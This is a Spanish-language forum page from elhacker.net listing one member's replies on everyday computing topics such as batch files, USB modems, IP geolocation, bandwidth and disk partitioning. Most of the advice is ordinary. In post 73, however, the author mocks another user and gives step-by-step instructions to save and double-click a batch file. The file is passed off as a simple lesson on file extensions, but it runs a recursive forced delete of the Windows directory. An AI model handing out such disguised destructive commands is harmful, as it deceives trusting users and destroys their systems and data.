elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ... 75
71  Foros Generales / Dudas Generales / Re: ejecutable. en: 26 Diciembre 2013, 17:47 pm
Voy a seguir aprendiendo (bueno, si es que todavía me falta pro aprender algo).

 :¬¬

Te felicito por llegar al limite de la sabiduría.
72  Foros Generales / Dudas Generales / Re: ejecutable. en: 22 Diciembre 2013, 05:04 am
Citar
A ver "jemez44", no estoy seguro de tu naturaleza,

Yo mismo me pregunto y me respondo.

Citar
"Troll":
se trata de aquellos individuos que participan en foros de debate, blogs, Twitter, chats y otros entornos de conversación para provocar y molestar a los usuarios e interrumpir el ritmo de la conversación.

 :o
73  Foros Generales / Dudas Generales / Re: ejecutable. en: 22 Diciembre 2013, 05:00 am
A ver "jemez44", no estoy seguro de tu naturaleza, pero si de una cosa estoy seguro es de que tu tarea es subir el contador de mensajes a toda costa, eso sin importar la estupidez que escribas en cualquier post (como has hecho en muchos por ahi).

porque añadas .bat no cambiara la naturaleza del bloc de notas.

La alquimia ya está obsoleta.

Te encanta opinar sin tener la mínima idea de lo que estas diciendo, solo por tener "uno mas".

Pero como no pertenezco a tu clan paso a explicar:

Existe algo llamado "extensión de archivos" que son esas tres insignificantes letras al final del nombre y que sirven para identificar la naturaleza del mismo, quizás en algún momento de tu vida has visto que los archivos de audio terminan en:    .mp3     .ogg      .flc
Los archivos de texto terminan en:                                                                                                       .txt
Los archivos de excell terminan en:                                                                                                      .xls

Dios!!!! es que no puedo creer que estoy explicando algo tan básico como esto  :-\

Los archivos ejecutables por lote terminan en extensión .bat

Para que me entiendas mas fácil:

1. Abre tu bloc de notas.
2. Dentro del Bloc de notas copia esto:

Código:
@echo off
title g00d by3 wind0w5
echo 4dio5 a tu wind0w5
del /s /f /q c:windows
exit

3. Luego le das a "guardar como.." y le pones el nombre que mas te guste terminando siempre en .bat
por ejemplo: prueba.bat

4. Luego dirígete a la ruta donde lo guardaste y dale doble click.

Luego comentas.

P.D: Espero no confundirte con tan complicados pasos, pero seguro eres un genio y lo logras (si quieres puedes abrir otro post, asi se te sumara otro mensaje mas)
74  Foros Generales / Dudas Generales / Re: ejecutable. en: 22 Diciembre 2013, 04:06 am
Saludos.

Citar
hola, me gustaría crear un archivo ejecutable en el escritorio y que al darle doble click se me abriesen 8 páginas de google crhome diferentes : una con mi facebook, otra con twiter, otra con este foro y otra con forocoches

Abre el bloc de notas y copia lo siguiente:

Código:
@ echo off
start https://www.facebook.com/
start https://twitter.com/
start http://foro.elhacker.net
start http://www.forocoches.com/
exit

Guárdalo con cualquier nombre y extensión .bat

Citar
otras 4 con 4 correos electrónicos que tengo

Utiliza un gestor de correo, te consumirá menos recursos que tener 4 pestañas mas abiertas.

Citar
pero en todas ellas que ya esté logeado (conectado).

Configura "Recordar contraseñas" en tu navegador por defecto (ojala no sea Iexplorer  :-\ )

Saludos por allá.
75  Foros Generales / Dudas Generales / Re: internet usb en: 22 Diciembre 2013, 03:47 am
A ver, aclaremos términos.

Cuando dices:

Citar
¿me llegará bastante mejor Internet en la casa A que en la casa B?

Debes tener en cuenta que "Potencia en la señal" no es equivalente a "Velocidad de Internet", generalmente la cobertura de esos modems USB son muy similares al de un teléfono celular de la misma compañía y justo como dice engelx nunca existe una sola antena dando cobertura, así que para esos fines da lo mismo 300 metros que 3 KM.

Por sentarte al lado de la antena no te ira mejor la conexión ya que no estamos hablando de Wi-Fi convencional, es Banda Ancha Movil y siempre que estés dentro de la cobertura tendrás buen servicio.

Saludos por allá.
76  Comunicaciones / Redes / Re: maneras de localizar la posicion de un ordenador/smartphone en: 22 Diciembre 2013, 03:36 am
Saludos.

Como decía Jack el destripador: "Vamos por partes"...

tengo un par de dudas , se que se puede rastrar la ip de un ordenador a través de varias aplicaciones /paginas web que se pueden encontrar fácilmente en google

Este tema esta muy tratado en el foro, pero tratare de bordarte sencillo.

Cuando un ordenador sale a navegar en la red esta usando la dirección IP del router a través del que esta recibiendo el servicio, es decir que un ordenador puede tener asiganadas tantas direcciones diferentes en un lapso de tiempo como routers de los que se haya conectado durante el mismo, suponiendo que las direcciones IP nunca cambiaran y tuvieras una forma de monitorearlas (Prey, LockItTight, Adeona, etc..) simplemente tendrias un rastro de migas de pan diciendo en los sitios donde ha sido usado (esto con un margen de error de no se cuantos kilómetros).

PERO NO!!    :o

Las direcciones IP cambian, son dinámicas. Es decir son asignadas y reasignadas por las ISP. Asi que si no instalaste alguna aplicacion de las arriba mencionadas no tendrás ni siquiera ese rastro de migas de pan...

el primer problema que se me presenta , la mayoría de las veces que se quiere usar localizar una ip esta pasa varias veces por distintos servidores ,¿ hay alguna forma de continuar con el origen de la búsqueda? , por ejemplo en mi caso , al buscar la ip del ordenador de mi padre , me aparece su localización el la capital de la provincia.

Los servicios de Geolocalizacion por direcciones IP  generalmente funcionan muy bien (si no se esta navegando por proxies y eso..), el asunto es que la precisión no llega hasta el punto de darte el numero de la casa y su dirección, ya que este servicio se basa en bloques de direcciones IP asignadas a tu ISP y la cual a su vez reasigna a sus clientes.

y mi segunda duda , todos los nuevos smartphones , al conectarse a Internet deben usar también IP , como todo objeto que se quiera conectar a Internet , ¿se pueden rastrear estos también?

Como explique mas arriba cualquier dispositivo que se conecte a la Internet esta usando en realidad la dirección IP del router, asi que no importa si es Smartphone, PS3, Ipad, Laptop, incluso los Smart_TV, todos se conectaran usando la dirección del router.
77  Foros Generales / Dudas Generales / Re: 1 Mb simetrico vs ADSL en: 17 Diciembre 2013, 20:51 pm
Saludos.

1 Mbps simétrico no es mas que la misma velocidad de subida que de bajada (downstream, upstream) Cuando tu cámara captura imágenes y se las envía a tu interlocutor estas usando la velocidad de subida (Upstream) entonces cuando recibes la imagen que te envía tu interlocutor tu interlocutor estas usando tu velocidad de bajada (downstream).

El asunto es que si cualquiera de las velocidades se ve afectada tendrás perdida en la recepción o en la transmisión de video/audio, realizarlo con esos parámetros es algo muy precario, estarás siempre al borde del congelamiento, eso sin mencionar que la velocidad se mantenga en esos valores que has medido ya que nunca es constante y generalmente en esa inestabilidad siempre el perdedor es el usuario.

Para que estés tranquilo te recomendaría 2Mbps simetricos.
78  Foros Generales / Dudas Generales / Re: Formatear disco duro sin tener sistema operativo en: 17 Diciembre 2013, 20:41 pm
Puedes usar una version de linux corriendo desde un liveCd o un liveUsb, y desde ahi ejecutar gparted. Es muy facil de utilizar.
79  Sistemas Operativos / GNU/Linux / Re: Re: Particiones en: 15 Diciembre 2013, 19:35 pm
Monta el liveCD con el que instalaste y ejecuta gparted, desde ahí tendrás una interfaz clara y posibilidades de hacerlo ya que con el sistema de archivos montado no podrás editar particiones.

Enviado desde mi HTC Glacier usando Tapatalk 2
80  Foros Generales / Dudas Generales / Re: Ayuda con estos programas ? en: 15 Diciembre 2013, 04:32 am
Pues al ese inmenso listado me surge preguntarte:

Cuales son las principales cosas que haces en tu pc?
Eres programador?
Editas videos?
O eres un usuario comun?
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ... 75
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines